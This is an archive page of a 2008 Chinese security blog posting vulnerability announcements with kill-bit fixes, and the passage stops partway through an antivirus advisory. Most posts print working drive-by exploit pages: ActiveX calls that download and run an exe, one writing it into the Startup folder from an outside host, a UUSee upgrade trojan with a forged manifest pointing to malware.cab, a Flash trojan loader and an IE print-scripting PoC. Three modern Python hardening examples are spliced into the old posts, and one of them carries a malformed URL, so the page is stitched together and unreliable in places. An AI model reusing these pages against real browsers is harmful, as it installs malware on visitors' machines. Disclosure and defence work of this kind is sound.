
Archive for the '漏洞公告' (Vulnerability Announcements) category

Sina (新浪) DLoader Class ActiveX Control Arbitrary File Download Vulnerability

Published: 2008-7-18

Last updated: 2008-7-18 1557 GMT

Affected systems:

Sina UC

Sina Internet TV (新浪网络电视)

Details:


知道安全 recently captured exploit code for this vulnerability; attack code exploiting it has been circulating on the Internet since July. Once a user visits an attack page crafted by an attacker, a malicious file may be downloaded and installed on the system and then run at every system start-up.



Test method:

The following code may carry out malicious actions; do not try it casually, and use it at your own risk.

<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://127.0.0.1/xxx.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>


Recommended countermeasures:

The vendor has released a fixed version of Sina Internet TV and is pushing a forced upgrade; users should update promptly.

UC users should keep watching http://www.51uc.com/ for an update.

Alternatively, set the kill bit for clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
"Compatibility Flags"=dword:00000400

Install 365门神 (WESEC), which protects Internet Explorer while it opens websites and blocks web-page attacks carrying malicious code. Help and download: http://www.scanw.com/

Vulnerability Announcements | GreySign | 18 Jul 2008

Microsoft Office Snapshot Viewer ActiveX Exploit

Published: 2008-7-10

Last updated: 2008-7-10 1557 GMT

Affected systems:

Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622

Details:


知道安全 recently captured exploit code for this vulnerability. Because it affects a wide range of systems and executes quickly, it is already being actively exploited by attackers.

The affected products are mainly Microsoft Access 2003 and earlier versions; any system with Microsoft Snapshot Viewer installed may be attacked.

Microsoft Access bundles the snapshot tool Microsoft Snapshot Viewer. Its control does not properly validate the SnapshotPath and CompressedPath parameters, so after a user visits an attack page crafted by an attacker, a malicious file may be written to an arbitrary location and then run at every system start-up.



Test method:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://www.scanw.com/greysign/test.exe';
// buf2 is the All Users Startup folder of a Chinese-language Windows XP,
// so the downloaded file runs at every logon
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
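The root cause above is that the control takes SnapshotPath and CompressedPath straight from the page. The following added example (written for this page; it is not code from the Snapshot Viewer control or from 知道安全) shows the two checks such a control should have made before touching the file system: the download source must be an https URL on an allow-listed host, and the destination must stay inside one dedicated directory and carry the expected extension. The base directory, the host list and the ".snp" suffix are assumptions chosen for the demonstration; ntpath is used explicitly so that Windows path semantics (drive letters, "/" as a separator, case-insensitive names) apply even when the check runs on another OS.

```python
import ntpath
from typing import Optional
from urllib.parse import urlsplit

# Assumptions for the demonstration: where snapshots may be written and fetched from.
SNAPSHOT_DIR = r"C:\Program Files\Snapshot Viewer\Downloads"
ALLOWED_HOSTS = {"reports.example.com"}
ALLOWED_SUFFIXES = (".snp",)


def safe_destination(requested: str, base_dir: str = SNAPSHOT_DIR) -> Optional[str]:
    """Return a normalised Windows path inside base_dir, or None if 'requested' escapes it."""
    if "\0" in requested:
        return None                      # an embedded NUL would truncate the path in the Win32 layer
    base = ntpath.normpath(base_dir)
    # join() discards base_dir when 'requested' is absolute ("C:/...", "\\\\server\\share\\...").
    # That is exactly the case the control failed to catch; the prefix test below catches it,
    # and normpath() resolves "..\\" components so traversal cannot hide behind them.
    candidate = ntpath.normpath(ntpath.join(base, requested))
    try:
        common = ntpath.commonpath([ntpath.normcase(base), ntpath.normcase(candidate)])
    except ValueError:                   # different drive letter or a UNC share
        return None
    if common != ntpath.normcase(base):
        return None                      # traversal or an absolute path outside the sandbox
    if not ntpath.basename(candidate).lower().endswith(ALLOWED_SUFFIXES):
        return None                      # wrong file type (e.g. test.exe), or a trailing dot/space
    return candidate


def safe_source(url: str) -> bool:
    """Only fetch over https from an allow-listed host."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS


def print_snapshot(snapshot_path: str, compressed_path: str) -> Optional[str]:
    """Hardened equivalent of the PrintSnapshot() entry point: validate both inputs first.

    Returns the destination path that may be written, or None when either input is refused.
    """
    if not safe_source(snapshot_path):
        return None
    return safe_destination(compressed_path)


if __name__ == "__main__":
    # The two values from the test page above are refused; a benign request is accepted.
    print(print_snapshot("http://http://www.scanw.com/greysign/test.exe",
                         "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe"))
    print(print_snapshot("https://reports.example.com/q1.snp", "2008/Q2/report.snp"))
```

The order matters: the prefix comparison runs on the normalised path, so "..\\" sequences, forward slashes and mixed case are all folded before the decision, and the extension test runs on the final name rather than on the raw input.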



Recommended countermeasures:

The vendor has not yet released a patch. Users of this software should watch the following address for updates:

http://www.microsoft.com/technet/security/

Set the kill bit for the following CLSIDs:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

Install 365门神 (WESEC), which protects Internet Explorer while it opens websites and blocks web-page attacks carrying malicious code. Help and download: http://www.scanw.com/

Vulnerability Announcements | GreySign | 10 Jul 2008

UUSee 0-day web trojan is already spreading on the Internet

Published: 2008-6-16

Last updated: 2008-6-17 1337 GMT

About UUSee Internet TV: UUSee Internet TV 2008 is a new Internet TV viewer from 悠视网 (UUSee); its users can watch more than 500 channels and over 1,000 programmes for free.

Affected version: UUSee Internet TV 2008 4.0.0.32 (UUUpgrade.ocx 3.0.2.12)

Description:



The 知道安全 emergency response team recently captured a web trojan, spreading on the Internet, that exploits a vulnerability in UUSee Internet TV. The UUSee trojan actually began circulating in January of this year but only recently started to spread widely. UUSee's upgrade control (CLSID {2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}, UUUpgrade.ocx 3.0.2.12) does not verify the upgrade file when performing an upgrade, so a forged upgrade file can make UUSee download and run a malicious program of the attacker's choosing.

Part of the code is as follows:

try {
    var g;
    var storm = new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");
} catch (g) {
} finally {
    if (g != "[object Error]") {
        var url = "http://***";
        storm = document.createElement("object");
        // the CLSID is split across three oddly named variables to defeat simple string matching
        ActivePerl = "-1C59-4BBB-8E8";
        getSpraySlide = "1-6E83F82C813B";
        helloworld2Address = "clsid:2CACD7BB";
        storm.setAttribute("classid", helloworld2Address + ActivePerl + getSpraySlide);
        // Update(localDir, manifestUrl, ...) fetches the attacker's UU.ini into the UUSee directory
        storm["Update"]("\\Program Files\\Common Files\\uusee\\", url + "UU.ini", "", 1);
    }
}

This code attacks by replacing the visitor's UU.ini so that the upgrade URL inside it points to a malicious file. The contents of that UU.ini are as follows:

[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1
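The update control above installs whatever UU.ini it fetches, so the manifest itself is the attack vector. The added example below (constructed for this page; it is not UUSee's updater code) shows the three checks a client-side updater can apply before installing anything: the manifest must carry a valid signature, every package URL must be an https location on the vendor's own host, and the downloaded package must match the digest recorded in the signed manifest. The keyed HMAC stands in for a real public-key signature, the sha256= field and the https://download.uusee.com URL are assumed additions to the manifest format, and the malicious manifest is the UU.ini reproduced above with its masked host left as is.

```python
import configparser
import hashlib
import hmac
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Demonstration stand-in for a vendor signing key (assumption): a real updater ships a
# public key and verifies an asymmetric signature instead of holding a shared secret.
MANIFEST_KEY = b"constructed-demo-manifest-key"
ALLOWED_HOSTS = {"download.uusee.com"}      # the download site the post recommends


def sign_manifest(text: str) -> str:
    return hmac.new(MANIFEST_KEY, text.encode("utf-8"), hashlib.sha256).hexdigest()


def check_update(manifest: str, signature: str, packages: Dict[str, bytes]) -> Tuple[bool, str]:
    """Decide whether the packages named by a UU.ini-style manifest may be installed."""
    # 1. Reject anything not signed by the vendor before parsing a single line of it.
    if not hmac.compare_digest(sign_manifest(manifest), signature):
        return False, "manifest signature invalid"

    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep key case: 'UUSeeMediaCenter.exe', 'Url'
    cp.read_string(manifest)

    for name in cp["Add"]:                    # [Add] lists every component to install
        if not cp.has_section(name):
            return False, f"{name}: no package section"
        sec = cp[name]
        # 2. Only fetch over https from the vendor's own host.
        url = sec.get("Url", "")
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
            return False, f"{name}: untrusted download location {url!r}"
        # 3. The bytes actually downloaded must match the digest in the signed manifest.
        if name not in packages:
            return False, f"{name}: package not downloaded"
        actual = hashlib.sha256(packages[name]).hexdigest()
        if not hmac.compare_digest(sec.get("sha256", ""), actual):
            return False, f"{name}: package digest mismatch"
    return True, "ok"


def build_manifest(name: str, version: str, url: str, package: bytes) -> str:
    """Produce a manifest in the UU.ini layout shown above, plus an assumed sha256= line."""
    return (
        "[Global]\n" f"TotalVersion={version}\n" "SubPath=UUPlayer_2008\nforce=2\n"
        "[Add]\n" f"{name}={version}\n" "[Kill]\n[Remove]\n"
        f"[{name}]\nUrl={url}\nsubpath=\nreg=1\ntype=1\n"
        f"sha256={hashlib.sha256(package).hexdigest()}\n"
    )


# The attacker's UU.ini from the post (constructed copy; the host was masked as *** there too).
MALICIOUS_MANIFEST = """\
[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1
"""

# A legitimate-looking manifest for comparison (package bytes are constructed).
GOOD_PACKAGE = b"constructed stand-in for the real UUSeeMediaCenter package bytes"
GOOD_MANIFEST = build_manifest(
    "UUSeeMediaCenter.exe", "9.0.0.12",
    "https://download.uusee.com/UUPlayer_2008/UUSeeMediaCenter.cab", GOOD_PACKAGE)
GOOD_SIGNATURE = sign_manifest(GOOD_MANIFEST)

if __name__ == "__main__":
    # Unsigned attacker manifest, then the same manifest even if the key had leaked, then a good one.
    print(check_update(MALICIOUS_MANIFEST, "0" * 64, {"UUSeeMediaCenter.exe": b"x"}))
    print(check_update(MALICIOUS_MANIFEST, sign_manifest(MALICIOUS_MANIFEST), {"UUSeeMediaCenter.exe": b"x"}))
    print(check_update(GOOD_MANIFEST, GOOD_SIGNATURE, {"UUSeeMediaCenter.exe": GOOD_PACKAGE}))
```

The signature check comes first so that an attacker-supplied manifest is never parsed at all; the host and digest checks are there so that a leaked signing key, or a compromised mirror, still cannot turn the updater into a downloader for arbitrary files.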

In addition, the earliest screenshot of the UUSee trojan generator to appear online:

[Image: 08061601.jpg]


Recommended countermeasures:

Install 365门神 (WESEC), which protects Internet Explorer while it opens websites and blocks web-page attacks carrying malicious code. Help and download: http://www.scanw.com/

悠视网 has now released the latest official version of UUSee Internet TV 2008, which fixes the 0-day vulnerability introduced by the ActiveX control; users should download the latest version from download.uusee.com immediately.

Vulnerability Announcements | GreySign | 16 Jun 2008

A Flash web trojan quietly appears on the Internet

Published: 2008-5-26

Last updated: 2008-5-26 1737 GMT

In the last few days we have intercepted a web trojan that exploits the Adobe Flash Player SWF file vulnerability. The web page loads a normal Flash file, which in turn loads an embedded, maliciously crafted Flash file; this triggers an overflow that may allow arbitrary instructions to be executed. The contents of the loading page are as follows:

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
// a "play" cookie marks visitors already served, so the SWF is delivered once per day per browser
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://www.XXX.cn/flash/XX.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.XXX.cn/flash/XX.swf" mce_src="http://www.XXX.cn/flash/XX.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>");}}
</script>

The script used by the normal Flash file is as follows:

// Action script... // [Action in Frame 1]
var flashVersion = /hxversion;
// the loader picks the crafted SWF that matches the installed Flash Player version
loadMovie("http://www.XXX.cn/flash/" + flashVersion + "mal_swf.swf", _root);
stop();

Part of the malicious Flash file is shown below:

[Image: 0805026.jpg]

Recommendation:



Vendor patch: Adobe
-----
The vendor has released an upgrade patch that fixes this security problem; download it from the vendor's home page:
http://www.adobe.com/go/getflash

Vulnerability Announcements | GreySign | 26 May 2008

Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability

<!--
Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability

Author: Aviv Raff
http://aviv.raffon.net/

Summary

Internet Explorer is prone to a Cross-Zone Scripting vulnerability in
its “Print Table of Links” feature. This feature allows users to add to
a printed web page an appendix which contains a table of all the links
in that webpage.

An attacker can easily add a specially crafted link to a webpage (e.g.
at his own website, comments in blogs, social networks, Wikipedia,
etc.), so whenever a user prints this webpage with this feature
enabled, the attacker will be able to run arbitrary code on the user's
machine (i.e. in order to take control over the machine).

Affected version

Internet Explorer 7.0 and 8.0b on a fully patched Windows XP.
Windows Vista with UAC enabled is partially affected (Information Leakage only).
Earlier versions of Internet Explorer may also be affected.

Technical details

Whenever a user prints a page, Internet Explorer uses a local resource
script which generates a new HTML page to be printed. This HTML consists of
the following elements: header, webpage body, footer, and, if enabled,
also the table of links in the webpage.

While the script takes only the text within the link's inner data, it
does not validate the URL of links, and adds it to the HTML as it is.
This allows an attacker to inject a script that will be executed when the new HTML
is generated.

As I said in a previous post, most of the local resources in Internet
Explorer are now running in Internet Zone. Unfortunately, the printing
local resource script is running in Local Machine Zone, which means that
any injected script can execute arbitrary code on the user’s machine.

Proof of Concept

The following is an example of a URL which executes Windows Calculator:

http://www.google.com/?q=<script defer>new ActiveXObject("Wscript.Shell").run("calc")</script>
-->

<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>

/* www.scanw.com  知道安全 */

Vulnerability Announcements | GreySign | 15 May 2008

Vulnerability in 联众世界 (Ourgame) GLIEDown2.dll; related web trojan appears online

Published: 2008-5-7

Last updated: 2008-5-7 1237 GMT

Source: 知道安全

We recently captured a web trojan that exploits a new vulnerability in the 联众 game platform. The trojan attacks through a vulnerable ActiveX control of 联众世界; users who have a vulnerable version installed and visit the malicious page risk having an arbitrary program downloaded and executed. The attack code is shown below:

[Image: 050701.jpg]

Affected version: 联众 game lobby 2.8.1.2.beta

The vendor has not yet released a patch.

Users are advised to use 365门神 to block malicious websites.

Alternatively, set the kill bit to prevent the attack:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F917534D-535B-416B-8E8F-0C04756C31A8}]
"Compatibility Flags"=dword:00000400
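Every post on this page that recommends a kill bit gives it as a hand-written .reg fragment, so a mistyped CLSID or flag value silently leaves the control enabled. The following added example (written for this page, not tooling from 知道安全) generates the fragment for a list of CLSIDs and, more usefully, parses an existing .reg export to confirm that each CLSID in the list actually has the 0x400 bit set in its Compatibility Flags, tolerating the curly quotes that copying from a web page tends to introduce. The CLSIDs in the constant are the ones the posts on this page name; the parser and its helper names are my own.

```python
import re
from typing import Dict, Iterable, List

# Bit in "Compatibility Flags" that stops Internet Explorer instantiating the control.
KILL_BIT = 0x00000400
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# CLSIDs for which posts on this page recommend a kill bit.
PAGE_CLSIDS = [
    "78ABDC59-D8E7-44D3-9A76-9A0918C52B4A",   # Sina DLoader class
    "F917534D-535B-416B-8E8F-0C04756C31A8",   # 联众世界 GLIEDown2.dll
    "2283BB66-A15D-4AC8-BA72-9C8C9F5A1691",   # Yahoo! Assistant ynotifier.dll
]

_KEY_RE = re.compile(r"^\[" + re.escape(COMPAT_KEY) + r"\\\{([0-9A-Fa-f-]{36})\}\]$")
_FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')


def make_killbit_reg(clsids: Iterable[str]) -> str:
    """Emit a .reg fragment in the layout used throughout this page."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines.append(f"[{COMPAT_KEY}\\{{{clsid.upper()}}}]")
        lines.append(f'"Compatibility Flags"=dword:{KILL_BIT:08x}')
        lines.append("")
    return "\n".join(lines)


def parse_killbits(reg_text: str) -> Dict[str, int]:
    """Map CLSID -> Compatibility Flags for every ActiveX Compatibility key in a .reg text."""
    flags: Dict[str, int] = {}
    current = None
    for raw in reg_text.splitlines():
        # .reg text copied from a web page often arrives with typographic quotes.
        line = raw.strip().replace("\u201c", '"').replace("\u201d", '"')
        key = _KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            flags.setdefault(current, 0)          # key present, value not seen yet
            continue
        if line.startswith("["):                  # some other registry key: stop attributing values
            current = None
            continue
        value = _FLAGS_RE.match(line)
        if value and current is not None:
            flags[current] = int(value.group(1), 16)
    return flags


def missing_killbits(reg_text: str, required: Iterable[str]) -> List[str]:
    """CLSIDs from 'required' that the .reg text does not kill-bit (absent, or bit not set)."""
    flags = parse_killbits(reg_text)
    return sorted(c.upper() for c in required if not flags.get(c.upper(), 0) & KILL_BIT)


if __name__ == "__main__":
    fragment = make_killbit_reg(PAGE_CLSIDS)
    print(fragment)
    print("missing:", missing_killbits(fragment, PAGE_CLSIDS))
```

Two practical points when using such a check on real exports: on 64-bit Windows the 32-bit Internet Explorer reads the same key under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node, so an audit should parse both hives, and the kill bit only affects Internet Explorer and other hosts that honour it; it does not stop a non-browser application from loading the same control.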

Vulnerability Announcements | GreySign | 07 May 2008

Yahoo! Assistant (3721) ActiveX Remote Code Execution Vulnerability

Source: http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html

Yahoo! Assistant (3721) ActiveX Remote Code Execution Vulnerability

Discovered by: Sowhat of Nevis Labs
Date: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

Vendor
Yahoo! CN

Affected versions:
Yahoo! Assistant <= 3.6 (versions before 04/23/2008)

Overview:
Yahoo! Assistant (formerly the 3721 Internet Assistant) is a BHO (Browser Helper Object) for IE.

Yahoo! Assistant has many functions, such as repairing IE settings, security protection, deleting browsing history, blocking advertisements, and so on.
For more information, see
http://cn.zs.yahoo.com/

Details:

The vulnerability exists in the ActiveX control ynotifier.dll.
Successful exploitation allows an attacker to execute arbitrary code on a computer with Yahoo! Assistant installed.
Successful exploitation requires luring the user to visit a specific web page.

An exploitable memory corruption occurs when the Ynotifier COM object is initialised through IE.

(c78.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e85328 ebx=001ada20 ecx=4080624c edx=00128474 esi=020cb5f0 edi=00000000
eip=43f50743 esp=001283e0 ebp=00128478 iopl=0         nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000             efl=00010246
43f50743 ??               ???

637a8b47 8b45f8           mov     eax,[ebp-0x8]
637a8b4a 8b08             mov     ecx,[eax]
637a8b4c 8d55fc           lea     edx,[ebp-0x4]
637a8b4f 52               push    edx
637a8b50 6a01             push    0x1
637a8b52 50               push    eax
637a8b53 ff5158           call    dword ptr [ecx+0x58] ; ds:0023:408062a4=43f50743

Here the virtual function pointer points at invalid data.

Using heap spraying, an attacker can exploit this vulnerability to execute arbitrary code.

Proof of Concept:
Saving just the line below as an HTML file is enough to trigger the vulnerability:
<object classid='clsid:2283BB66-A15D-4AC8-BA72-9C8C9F5A1691'>

Workaround:
Set a kill bit for this ActiveX control.

Vendor response:

2008.04.23 Vendor notified by e-mail
2008.04.23 Vendor replied and began developing a patch
2008.04.23 Patch completed, but the vendor asked for disclosure to be delayed because they needed time to push the patch out
2008.05.06 Advisory published (the vendor has not published any announcement)

Vulnerability Announcements | GreySign | 06 May 2008

Remote overflow in the Xunlei (迅雷) DownAndPlay.dll module

Source: http://hi.baidu.com/dummy24/blog/item/bb0a3c11cfcaf57bcb80c4b3.html

/*
Sorry, I did not look at this problem carefully. This hole really cannot be overflowed remotely.
*/

After Xunlei starts, DownAndPlay.dll (I do not know in which version this module first appeared; mine is the latest version) binds local port 36897 and waits for connections.
The data format it accepts is XLDAP|key|value|XLDAP, where key is one of several predefined names.
The one chosen here to produce the overflow is savepath: when value is over-long, the overflow happens at the sprintf.
The attached 11.dat is a hastily constructed piece of data; you can use nc to see the effect. Run the command,
and Xunlei exits because of the exception.

Anyone interested can try writing complete attack code.

C:\>nc 127.0.0.1 36897 <11.dat

23132CB6     8D45 A0          lea      eax, dword ptr [ebp-60]
23132CB9     E9 84010000      jmp      23132E42
23132CBE     68 B4C61323      push     2313C6B4                          ; ASCII “savepath”
23132CC3     57               push     edi
23132CC4     FFD6             call     esi
23132CC6     59               pop      ecx
23132CC7     84C0             test     al, al
23132CC9     59               pop      ecx
23132CCA     74 5F            je       short 23132D2B
23132CCC     8B75 0C          mov      esi, dword ptr [ebp+C]
23132CCF     8B0D E0D21323    mov      ecx, dword ptr [2313D2E0]
23132CD5     56               push     esi
23132CD6     E8 EBE5FFFF      call     231312C6
23132CDB     8B46 04          mov      eax, dword ptr [esi+4]
23132CDE     8B0D B0E41323    mov      ecx, dword ptr [<&MSVCP60.`std::>; MSVCP60.`std::basic_string<char,std::char_traits<char>,std::allocator<char> >::_Nullstr’::`2′::_C
23132CE4     85C0             test     eax, eax
23132CE6     8BD1             mov      edx, ecx
23132CE8     74 02            je       short 23132CEC
23132CEA     8BD0             mov      edx, eax
23132CEC     8B7F 04          mov      edi, dword ptr [edi+4]
23132CEF     85FF             test     edi, edi
23132CF1     74 02            je       short 23132CF5
23132CF3     8BCF             mov      ecx, edi
23132CF5     B8 D4C61323      mov      eax, 2313C6D4                     ; ASCII “XLDAP”
23132CFA     50               push     eax
23132CFB     52               push     edx
23132CFC     51               push     ecx
23132CFD     50               push     eax
23132CFE     8D85 5CFEFFFF    lea      eax, dword ptr [ebp-1A4]
23132D04     68 C0C61323      push     2313C6C0                          ; ASCII “%s|%s|%s|%s”
23132D09     50               push     eax

Where the overflow occurs:
23132D0A     FF15 54E51323    call     dword ptr [<&MSVCRT.sprintf>]     ; MSVCRT.sprintf
23132D10     8D85 5CFEFFFF    lea      eax, dword ptr [ebp-1A4]
23132D16     50               push     eax

[Image: 080506.JPG]

Vulnerability Announcements | GreySign | 06 May 2008

Warning: serious vulnerabilities in major antivirus products

Published: 2008-4-29

Last updated: 2008-4-29 21:37 GMT
知道安全

Thanks to AYANAMI REI for the translation.

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Insufficient argument validation in the SSDT hook functions of multiple antivirus and firewall products
*Advisory Information*

Title: Insufficient argument validation in the SSDT hook functions of multiple antivirus and firewall products
Advisory ID: CORE-2008-0320
Advisory URL: http://www.coresecurity.com/?action=item&id=2249
Date published: 2008-04-28
Date of last update: 2008-04-28
Vendors contacted: BitDefender, Comodo, Sophos and Rising
Release mode: Coordinated release (BitDefender, Comodo, Rising), user release (Sophos)
*Vulnerability Information*

Class: Invalid memory argument
Remotely exploitable: No
Locally exploitable: Yes
Bugtraq ID: 28741, 28742, 28743, 28744
CVE Name: CVE-2008-1735, CVE-2008-1736, CVE-2008-1737, CVE-2008-1738
*Vulnerability Description*

A cursory inspection of the SSDT hook functions of several antivirus and firewall products (BitDefender Antivirus [1], Comodo Firewall [2], Sophos Antivirus [3] and Rising Antivirus [4]) found flaws that can cause a denial of service (DoS) and may allow code execution. An attacker exploiting these flaws can reboot the system locally, shutting down the firewall and antivirus protection. In many cases, moreover, it may be possible to use these bugs to execute arbitrary code in privileged kernel mode.

*Vulnerable Packages*

. BitDefender Antivirus 2008 Build 11.0.11
. Comodo Firewall Pro 2.4.18.184
. Sophos Antivirus 7.0.5
. Rising Antivirus 19.60.0.0 and 19.66.0.0
. Older versions were not tested and may be affected.
*Non-vulnerable Packages*

. BitDefender Antivirus 2008 updated through automatic updates to a build later than January 18
. Comodo Firewall Pro 3.0
. Rising Antivirus 20.38.20
*Vendor Information, Solutions and Workarounds*

1) BITDEFENDER ANTIVIRUS (BID 28741, CVE-2008-1735)

According to BitDefender, this flaw has not been exploited by malicious programs and has been corrected through automatic updates. Information about the problem is available on BitDefender's website: http://kb.bitdefender.com/KB419-en--Security-vulnerability-in-BitDefender-2008.html
2) COMODO FIREWALL PRO (BID 28742, CVE-2008-1736)

This vulnerability is fixed in Comodo Firewall Pro 3.0; the new version can be downloaded at http://www.personalfirewall.comodo.com/download_firewall.html
3) SOPHOS ANTIVIRUS (BID 28743, CVE-2008-1737)

Vendor statement: "Sophos Anti-Virus 7.x on Windows 2000, 2003 and XP is affected by this vulnerability." Unaffected Sophos products include earlier versions of Sophos Anti-Virus for Windows, Sophos Anti-Virus for non-Windows platforms and other Sophos products.

The vulnerability can only be exploited when real-time Behavior Analysis is enabled. It also requires the user to have lowered the web browser's security settings below the default level, or to allow ActiveX controls or Java applets to be launched from web pages.

Exploitation can be avoided by the following measures:

a. Use an up-to-date web browser with default or higher security settings. As a general security practice, we advise users not to download ActiveX controls or Java applets unless they trust the content.

b. Disable the real-time Behavior Analysis feature of Sophos Anti-Virus. (Users remain protected by Sophos Behavioral Genotype analysis and the other anti-malware protection mechanisms.)

N.B. If exploit code is released, Sophos will deploy protection against it.

Fixing the vulnerability requires the endpoint to be restarted. Because this is a non-urgent vulnerability, and to disturb our customers as little as possible, Sophos will include the fix at the earliest opportunity in a product release that already requires a restart.
4) RISING ANTIVIRUS (BID 28744, CVE-2008-1738)

A fixed version of Rising Antivirus can be downloaded at http://rsdownload.rising.com.cn/for_down/rsfree/ravolusrfree.exe.

All Rising users can update to the patched version through automatic updates.
*Credits*

These vulnerabilities (except Rising's) were discovered by Damian Saura, Anibal Sacco, Dario Menichelli, Norberto Kueffner, Andres Blanco and Rodrigo Carvalho of Core Security Technologies during bugweek 2007. The Rising vulnerability was discovered by Anibal Sacco of the Core Security Technologies exploit writers team.
*Technical Description / Proof of Concept Code*

We found that BitDefender Antivirus, Rising Antivirus, Comodo Firewall and Sophos Antivirus do not validate the arguments their hook functions use, so the code ends up referencing invalid memory and produces a BSOD (Blue Screen of Death).

In our tests we used the kernel hook probing tool BSODhook [5] to look for any kind of insufficiently validated SSDT hook argument. From Matousec's paper [6]:

"Hooking kernel functions by modifying the System Service Descriptor
Table (SSDT) is a very popular method of implementation of additional
security features and is used frequently by personal firewalls and other
security and low-level software. Although undocumented and despised by
Microsoft, this technique can be implemented in a correct and stable
way. However, many software vendors do not follow the rules and
recommendations for kernel-mode code writing and many drivers that
implement SSDT hooking do not properly validate the parameters of the
hooking functions."

"Hooking SSDT functions requires extra caution. SSDT function handlers
are executed in the kernel mode but their callers are executed in the
user mode. Hence all function arguments come from the user mode. This is
why it is necessary to validate these arguments properly. Otherwise a
simple user call can easily crash the whole system. This bug usually
results in a system crash. However, it may happen that this bug is even
more dangerous and may lead to the execution of an arbitrary code in the
privileged kernel mode."

A local DoS attack, despite not being a very sophisticated intrusion
attack, could be used as an accessory under several scenarios. It is
commonly used by viruses as an added feature, when the specific AV is
detected on the infected machine, crashing the system just to annoy. Or
by a human attacker, after a successful remote intrusion with
unprivileged credentials, to make a computer resource unavailable to its
intended users. Besides, this could be a very valuable resource when
trying to fake some service that answers broadcast requests, like DHCP,
allowing the service to be started in another location, replacing the original
one.

1) BITDEFENDER ANTIVIRUS (BID 28741, CVE-2008-1735)

BitDefender fails to validate the pointer to the 'CLIENT_ID' structure
provided to 'NtOpenProcess'. So, if we pass an invalid pointer, we will
crash the whole system.

/———–

NtOpenProcess(PHANDLE ProcessHandle,
ACCESS_MASK AccessMask,
POBJECT_ATTRIBUTES ObjectAttributes,
PCLIENT_ID ClientId )

.text:00010ADE push 0Ch
.text:00010AE0 push offset stru_114E8
.text:00010AE5 call __SEH_prolog
.text:00010AEA call KeGetCurrentThread
